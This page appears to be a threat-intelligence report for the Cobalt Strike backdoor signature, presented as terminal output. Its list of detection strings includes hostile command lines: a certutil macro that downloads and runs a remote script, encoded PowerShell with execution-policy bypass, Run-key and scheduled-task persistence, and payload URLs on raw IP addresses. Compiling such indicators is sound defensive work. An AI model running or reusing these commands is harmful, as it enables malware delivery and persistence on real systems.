user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Backdoor:Win64/CobaltStrike!pz
Backdoor:Win64/CobaltStrike!pz - Windows Defender threat signature analysis

Backdoor:Win64/CobaltStrike!pz - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:Win64/CobaltStrike!pz
Classification:
Type:Backdoor
Platform:Win64
Family:CobaltStrike
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!pz
Packed or compressed to evade detection
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Backdoor - Provides unauthorized remote access for 64-bit Windows platform, family CobaltStrike

Summary:

This detection identifies a Cobalt Strike Beacon, a potent post-exploitation framework used by advanced threat actors. The threat establishes persistence via scheduled tasks and provides the attacker with full remote control to execute commands, steal data, and move laterally within the network.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - \cobaltstrike 3.14\payload\AvByPass (PEHSTR_EXT)
 - S/F /Create /TN Tencentid /sc minute /MO 1 /TR C:\Users\Public\Music\tencentsoso.exe (PEHSTR)
 - C:\Users\Public\Music\cia.plan (PEHSTR)
 - !C:\Users\Public\Music\SideBar.dll (PEHSTR)
 - artifact64big.dll (PEHSTR_EXT)
 - artifact32big.dll (PEHSTR_EXT)
 - K[ZKK\OKM (PEHSTR_EXT)
 - GetCommandLineA (PEHSTR_EXT)
 - GetCommandLineW (PEHSTR_EXT)
 - \\.\pipe\MSSE-1966-server (PEHSTR_EXT)
 - temp.dll (PEHSTR_EXT)
 - ././., (PEHSTR_EXT)
 - .,./., (PEHSTR_EXT)
 - /posts/ (PEHSTR_EXT)
 - /ivc/ (PEHSTR_EXT)
 - /k&>}2 (SNID)
 - vN.6b (SNID)
 - Microsoft Base Cryptographic Provider v1.0 (PEHSTR_EXT)
 - HttpAddRequestHeadersA (PEHSTR_EXT)
 - beacon.dll (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - \\.\pipe\bypassuac (PEHSTR_EXT)
 - \\.\pipe\keylogger (PEHSTR_EXT)
 - /send%s (PEHSTR_EXT)
 - rcap:// (PEHSTR_EXT)
 - \\.\pipe\netview (PEHSTR_EXT)
 - \\.\pipe\powershell (PEHSTR_EXT)
 - \\.\pipe\screenshot (PEHSTR_EXT)
 - \\.\pipe\elevate (PEHSTR_EXT)
 - \\.\pipe\hashdump (PEHSTR_EXT)
 - Global\SAM (PEHSTR_EXT)
 - \\.\pipe\portscan (PEHSTR_EXT)
 - \\%s\ipc$ (PEHSTR_EXT)
 - \\.\pipe\sshagent (PEHSTR_EXT)
 - COBALTSTRIKE (PEHSTR_EXT)
 - %1024[^ ] %8[^:]://%1016[^/]%7168 (PEHSTR_EXT)
 - \\%s\pipe\msagent_%x (PEHSTR_EXT)
 - [command] (PEHSTR_EXT)
 - \\.\pipe\mimikatz (PEHSTR_EXT)
 - test.dll (PEHSTR_EXT)
 - shellcodeexecute (PEHSTR_EXT)
 - Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
 - CWEMRvwtJNovrrWsIwERjSjD (PEHSTR_EXT)
 - github.com/mitre/gocat/ (PEHSTR_EXT)
 - AS\e\%r (SNID)
 - could not run command (w/ token) because of its length of %d bytes! (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand "%s" (PEHSTR_EXT)
 - spawn::decrypting... (PEHSTR)
 - \regedit.exe (PEHSTR)
 - tps://122.228.7.225/admin?file= (PEHSTR_EXT)
 - 122.193.130.74 (PEHSTR_EXT)
 - 121.207.229.145 (PEHSTR_EXT)
 - File Download Success. (PEHSTR_EXT)
 - download.exe (PEHSTR_EXT)
 - /checker (PEHSTR_EXT)
 - YG@JG\ (PEHSTR_EXT)
 - |ZB{]K\zF\KOJ}ZO\Z (PEHSTR_EXT)
 - HTTP/1.1 200 OK (PEHSTR_EXT)
 - %02d/%02d/%02d %02d:%02d:%02d (PEHSTR_EXT)
 - CFy92ROzKls\ro\HwtAF.pdb (PEHSTR_EXT)
 - r8BsHuPe56l\ilYp\i12tW5S7m3 (PEHSTR_EXT)
 - /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v  (PEHSTR_EXT)
 -  /t REG_SZ /d "Rundll32.exe SHELL32.DLL,ShellExec_ (PEHSTR_EXT)
 - 7I.S_T (SNID)
 - \.\pipe\Vmware.0000000000.0002 (PEHSTR_EXT)
 - 127.0.0.1 (PEHSTR_EXT)
 - gigabigsvc.dll (PEHSTR_EXT)
 - cmd.exe (PEHSTR_EXT)
 - \>~gZ (SNID)
 - shellcodeloading/checkSandbox.timeSleep (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.physicalMemory (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.numberOfCPU (PEHSTR_EXT)
 - sync.(*Mutex).Lock (PEHSTR_EXT)
 - crypto/cipher.xorBytes (PEHSTR_EXT)
 - shellcodeloading/aes.AesDecrypt (PEHSTR_EXT)
 - runtime.injectglist (PEHSTR_EXT)
 - sync.(*Mutex).lockSlow (PEHSTR_EXT)
 - sync.(*entry).load (PEHSTR_EXT)
 - shellcodeloading/checkSandbox.CheckSandbox (PEHSTR_EXT)
 - crypto/cipher.NewCBCDecrypter (PEHSTR_EXT)
 - crypto/cipher.xorBytesSSE2 (PEHSTR_EXT)
 - crypto/aes.decryptBlockGo (PEHSTR_EXT)
 - 0.bin (PEHSTR_EXT)
 - \Bypass_AV.pdb (PEHSTR_EXT)
 - Bypass_AV.pdb (PEHSTR_EXT)
 - InternetReadFile(...) (PEHSTR_EXT)
 - HttpSendRequestA(...) (PEHSTR_EXT)
 - /htEp (PEHSTR_EXT)
 - oshi.at (PEHSTR_EXT)
 - UserInitMprLogonScript (PEHSTR_EXT)
 - notepad.exe (PEHSTR_EXT)
 - %s as %s\%s: %d (PEHSTR_EXT)
 - beacon.x64.dll (PEHSTR_EXT)
 - Updater.dll (PEHSTR_EXT)
 - Content-Type: application/octet-stream (PEHSTR_EXT)
 - DllMain (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - hovitdz.dll (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%ckirito\asuna (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cwarcraft\dota (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cralka\ribak (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cmark\dabollo (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cpapizor\gojo (PEHSTR_EXT)
 - cmd /c C:\Windows\Temp (PEHSTR_EXT)
 - DllGetClassObject (PEHSTR_EXT)
 - executeShellcode (PEHSTR_EXT)
 - \SLN\HRM_SUB\ (PEHSTR_EXT)
 -  \HRM_SUB.pdb (PEHSTR_EXT)
 - AVBypass.pdb (PEHSTR_EXT)
 - http_dll.dat (PEHSTR_EXT)
 - weeulsf763bs1.dll (PEHSTR_EXT)
 - //rs.qbox.me/chtype/ (PEHSTR_EXT)
 - Dbak/chdb:qiniu.png (PEHSTR_EXT)
 - 252.72.131.228 (PEHSTR_EXT)
 - 240.232.200.0 (PEHSTR_EXT)
 - 0.0.65.81 (PEHSTR_EXT)
 - 65.80.82.81 (PEHSTR_EXT)
 - 86.72.49.210 (PEHSTR_EXT)
 - 101.72.139.82 (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Aborting... (PEHSTR_EXT)
 - -sta -noprofile -executionpolicy bypass -encodedcommand (PEHSTR_EXT)
 - Press any key... (PEHSTR_EXT)
 - http://144.48.240.85/18.exe (PEHSTR_EXT)
 - 4Bejz8txQ/rDnf (PEHSTR_EXT)
 - ShellCodeLoader\bin (PEHSTR_EXT)
 - http://49.234.65.52/UpdateStream_x86.cab (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - \x91\xe1\xa19 (PEHSTR_EXT)
 - \xE9\xE8\Xa1 (PEHSTR_EXT)
 - 0ZNA3EZ4g.exe (PEHSTR_EXT)
 - 0ZNA3EZ4g.xlsx (PEHSTR_EXT)
 - legacy.chunk.js (PEHSTR_EXT)
 - windows\temp\ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - getparagraphopendllpathforbinaryas1put1bclose1 (MACROHSTR_EXT)
 - namefnzstasstatbase64decodexe1py3jvc29mdfxuzwftc1xjdxjyzw50etdsendifend (MACROHSTR_EXT)
 - [i] Injecting The Reflective DLL Into (PEHSTR_EXT)
 - RlfDllInjector.pdb (PEHSTR_EXT)
 - windows.ini (PEHSTR)
 - mgur730yw1.dll (PEHSTR_EXT)
 - \Parallel_Asis.dll (PEHSTR_EXT)
 - mscorsvc.dll (PEHSTR_EXT)
 - 1.dll (PEHSTR_EXT)
 - Loader.nim (PEHSTR_EXT)
 - bcmode.nim (PEHSTR_EXT)
 - Test.dll (PEHSTR_EXT)
 - \.\PhysicalDrive0 (PEHSTR_EXT)
 - temp\packed64-temp.pdb (PEHSTR_EXT)
 - \projects\garda\storage\targets\work6.x2.pdb (PEHSTR_EXT)
 - .sedata (PEHSTR_EXT)
 - .gehc (PEHSTR_EXT)
 - Release\movenpeak.pdb (PEHSTR_EXT)
 - System.Web.ni.dll (PEHSTR_EXT)
 - 0cobaltstrike-chtsec (PEHSTR_EXT)
 - ({y#y/ (SNID)
 - DetectAttack.dll (PEHSTR_EXT)
 - x64\Debug\DetectAttack.pdb (PEHSTR_EXT)
 - powershell -nop -exec bypass -EncodedCommand (PEHSTR_EXT)
 - nfvurg856lk63.dll (PEHSTR_EXT)
 - programdata\3bef479.tmp (PEHSTR_EXT)
 - Release\SetupEngine.pdb (PEHSTR_EXT)
 - Applebaidugooglebingcsdnbokeyuanhelloworld.com (PEHSTR_EXT)
 - ;\$ r (PEHSTR_EXT)
 - PolicyPlus.Resources.resources (PEHSTR_EXT)
 - %c%c%c%c%c%c%c%c%cnetsvc\ (PEHSTR_EXT)
 - enhanced-google.com (PEHSTR_EXT)
 - Control_RunDLL "C:\ProgramData\AxlnstSV\xlsrd.cpl (PEHSTR_EXT)
 - E2/L9L$@ (PEHSTR_EXT)
 - CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
 - \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
 - Memory permissions changed successfully: PAGE_EXECUTE (PEHSTR_EXT)
 - QlZylT5WMZcGIAyTUbSGnAerR.resources (PEHSTR_EXT)
 - New Project 2.exe (PEHSTR_EXT)
 - raw.githubusercontent.com/kk-echo123/aoisndoi/ (PEHSTR_EXT)
 - .retplne (PEHSTR_EXT)
 - wsc_UUIDS.dll (PEHSTR_EXT)
 - D:\project\doge-cloud\targetfiles (PEHSTR_EXT)
 - on_avast_dll_unload (PEHSTR_EXT)
 - main.AesDecrypt (PEHSTR_EXT)
 - peloader\peloader_64\ (PEHSTR_EXT)
 - \Release\peloader (PEHSTR_EXT)
 - StartDllLoadData (PEHSTR_EXT)
 - vscodeWorkSpace\shellcode\whiteandblack (PEHSTR_EXT)
 - AvastSvc.exe (PEHSTR_EXT)
 - kpm_tray.exe (PEHSTR_EXT)
 - AtomLdr.dll (PEHSTR_EXT)
 - A7d8Gw8XN////76uvq+trqm3zi2at3Stn7d0ree3dK3ft3SNr7fwSLW1ss42t84/U (PEHSTR_EXT)
 - RunScript (PEHSTR_EXT)
 - PoolAndSpaDepot.My.Resources (PEHSTR_EXT)
 - test1\source\repos\download\x64\Release\download.pdb (PEHSTR_EXT)
 - \SudSolver.pdb (PEHSTR_EXT)
 - jsporvjlfsqmlsamxdrvitxha (PEHSTR_EXT)
 - api.gogleapi.click/file/System/ (PEHSTR_EXT)
 - Projects\evasionC_go\workingSpace (PEHSTR_EXT)
 - _seh_filter_dll (PEHSTR_EXT)
 - BoevVBacejSmwcZ (PEHSTR_EXT)
 - \Shellcode\ReflectiveLoader.pdb (PEHSTR_EXT)
 - /|bD;X (SNID)
 - MACOSX\pdf.pdf (PEHSTR_EXT)
 - sync.(*RHe0UcdpHEv).RUnlock (PEHSTR_EXT)
 - nX0mgbuOjw.(*wU6_Xfv4).bqwSOvr5m (PEHSTR_EXT)
 - yCcdI7eVq.(*UE5TRl).xKFXpU5Cyab (PEHSTR_EXT)
 - PT2MtVR9gr5.go (PEHSTR_EXT)
 - CallDLLDynamic.pdb (PEHSTR_EXT)
 - per_thread_data.cpp (PEHSTR_EXT)
 - [*] Executing (PEHSTR_EXT)
 - ConsoleApp1.exe (PEHSTR_EXT)
 - n/q9) (SNID)
 - ,!B2,/H;t$ (PEHSTR_EXT)
 - krpt_RemoveDllFilterProtectDetour (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - GEMS\GEMS\obj\Release\GEMS.pdb (PEHSTR_EXT)
 - Users\Apocalypse\ (PEHSTR_EXT)
 - \Rust\client\1.pdb (PEHSTR_EXT)
 - 57k7w2hd52.8pfyh.ws:8443/TseNn7 (PEHSTR_EXT)
 - quiomnissitaliquidmolestias24.dll (PEHSTR_EXT)
 - xxxx.dll (PEHSTR_EXT)
 - DllUnregisterServer (PEHSTR_EXT)
 - /Mark\NewVirus\CPP\msedge\x64\Release\msedge.pdb (PEHSTR)
 - msedge.dll (PEHSTR)
 - http://www.flntp.ro/fintp.x64.bin (PEHSTR_EXT)
 - ConsoleApplication6.pdb (PEHSTR_EXT)
 - systeminfo.txt (PEHSTR_EXT)
 - dfbfdhbfddfbfdnhdfhfd.fll (PEHSTR_EXT)
 - D$.2D$FC (PEHSTR_EXT)
 - D$/2D$GC (PEHSTR_EXT)
 - C:\Users\Public (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - NewWYDll\NewWYDll\Release\NewWYDll.pdb (PEHSTR_EXT)
 - %s\updater.exe (PEHSTR_EXT)
 - %s\libcurl.dll (PEHSTR_EXT)
 - cobalt-strike-master\x64\Release\msedge.pdb (PEHSTR_EXT)
 - \Windows\CurrentVersion\Run (PEHSTR_EXT)
 - \mfehcs.exe (PEHSTR_EXT)
 - cmd /c taskkill /F /PID (PEHSTR_EXT)
 - \MyNewDLL\x64\Release\pdh.pdb (PEHSTR_EXT)
 - libEGL.dll.pdb (PEHSTR_EXT)
 - kapitalbankaz.azurewebsites.net/api/getit (PEHSTR_EXT)
 - InternetExplorer.pdb (PEHSTR_EXT)
 - http://149.28.222.244:8000/ (PEHSTR_EXT)
 - Shellcode decryption complete. (PEHSTR_EXT)
 - f574d29994a3adc68dcbd2a39596331713957734.bin.packed.dll (PEHSTR_EXT)
 - Wininet. (PEHSTR_EXT)
 - dll (PEHSTR_EXT)
 - Press <Enter> To Execute The Payload ... (PEHSTR_EXT)
 - \SophosUninstall.p (PEHSTR_EXT)
 - SophosFS.p (PEHSTR_EXT)
 - SophosNtpUninstall.p (PEHSTR_EXT)
 - SophosFSTelemetry.p (PEHSTR_EXT)
 - /CPNGXa3g1gm8hD3zsdW (PEHSTR_EXT)
 - lease\Project5.pdb (PEHSTR_EXT)
 - minimaaccusamusnihilvoluptaset90.dll (PEHSTR_EXT)
 - Decrypted %d... (%d %%) i = %d; full_length = %d (PEHSTR_EXT)
 - Decrypted %d...ok! (PEHSTR_EXT)
 - *,d:/th/ds/ext/aad (PEHSTR_EXT)
 - NLc0MDg9zP6VTvRMbffF0O23WgXbBZBl3PO9/14+ABQ= (PEHSTR_EXT)
 - atks.exe (PEHSTR_EXT)
 - ://0x1.social (PEHSTR_EXT)
 - 47.92.131.203 (PEHSTR_EXT)
 - Windows.pdb (PEHSTR_EXT)
 - .C0D. (PEHSTR_EXT)
 - main.xorDecrypt (PEHSTR_EXT)
 - main.AesDecryptCFB (PEHSTR_EXT)
 - main.refun (PEHSTR_EXT)
 - main.run (PEHSTR_EXT)
 - d20%:d20%:d20% d20%/d20%/d20% (PEHSTR)
 - 0% d20%/d20%/d20 (PEHSTR)
 - g('http://47.106.67.138:80/a')) (PEHSTR_EXT)
 - System.Management.Automation.AmsiUtils (PEHSTR_EXT)
 - main.AesDecryptByECB (PEHSTR_EXT)
 - main.PKCS7UNPadding (PEHSTR_EXT)
 - main.closeWindows (PEHSTR_EXT)
 - runtime.sysReserve (PEHSTR_EXT)
 - runtime.badctxt (PEHSTR_EXT)
 - runtime.allgadd (PEHSTR_EXT)
 - runtime.traceShuttingDown (PEHSTR_EXT)
 - runtime.traceLocker.GoSched (PEHSTR_EXT)
 - \$0E3 (PEHSTR)
 - lease\x64\overseer.pdb (PEHSTR_EXT)
 - axy1/TpcPcZwBtQYcCL6rREEc/8XLJ (PEHSTR_EXT)
 - maskdesk.info (PEHSTR_EXT)
 - /file (PEHSTR_EXT)
 - System32\notepad.exe (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - almounah/go-buena-clr (PEHSTR_EXT)
 - chrome_decrypt.log (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - f_u_c_k...... (PEHSTR_EXT)
 - Ran CobaltStrike (PEHSTR_EXT)
 - ReverseShell_%s_%s.exe (PEHSTR_EXT)
 - aLdbcGgcd@hdf;iff9igf5jgg/khg)khg (PEHSTR_EXT)
 - bWebdRgceNhdfHjehAjfh<lhi9lij6mij/njk(njk (PEHSTR_EXT)
 - fbdXhdeSiegOjfhGlhiAmij<mik9okl5okl.plm'qll!rnn (PEHSTR_EXT)
 - alfccahdfZjfhUkgjOmijHnklBqmm>qmn:rno6soo.sop'tpp!wsr (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 63101038b04ac1387a6e8849f6a9c7723120c748a57d6.exe
63101038b04ac1387a6e8849f6a9c7723120c748a57d663491f81e3b88b96f37
28/01/2026
VirusTotalDownload Sample
Filename: 13b0c7e965333eccf3233be205ce4360.exe
ad195ae51946b4b4aad4fce944e58dc3f0b8c9d2f058314fb54ca476fe5daae5
20/01/2026
VirusTotalDownload Sample
Filename: bc5cc133d250058080a284fb1f6ce394f588b8363d4ec.exe
bc5cc133d250058080a284fb1f6ce394f588b8363d4ec7fa8af163acce309da6
17/01/2026
VirusTotalDownload Sample
Filename: bcd332c9a77700156ef02bffec7d0c5a09dbf5c6ee2e9.exe
bcd332c9a77700156ef02bffec7d0c5a09dbf5c6ee2e924a1eff56bbac70c801
14/01/2026
VirusTotalDownload Sample
Filename: 0be5b92bd1e8acef055ef1f1de67aef5.exe
5a5c149b165ec4d6366c2ffdf1c9bfc2138577cb5b058ee852bdf4c6d978fd06
07/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected machine from the network to prevent lateral movement. Investigate the scope of the compromise, as other systems are likely affected. Remove identified malicious files and persistence mechanisms, reset all credentials on the system, and re-image the device from a known-good source.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 05/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$